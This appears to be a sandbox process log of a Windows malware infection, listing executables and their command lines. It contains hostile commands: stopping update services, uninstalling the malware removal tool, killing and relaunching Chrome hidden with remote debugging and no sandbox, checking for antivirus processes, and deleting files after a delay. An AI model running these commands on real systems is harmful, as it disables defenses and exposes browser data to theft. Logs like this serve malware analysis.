C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\AppData\Local\Temp\275919514.exe
C:\Users\Admin\AppData\Local\Temp\275919514.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5772 -ip 5772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 1312
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\explorer.exe
explorer.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Users\Admin\Desktop\Files\2.exe
"C:\Users\Admin\Desktop\Files\2.exe"
C:\Users\Admin\Desktop\Files\t.exe
"C:\Users\Admin\Desktop\Files\t.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5908 -ip 5908
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5908 -s 444
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\AppData\Local\Temp\1014487001\81c18992ca.exe
"C:\Users\Admin\AppData\Local\Temp\1014487001\81c18992ca.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\explorer.exe
explorer.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
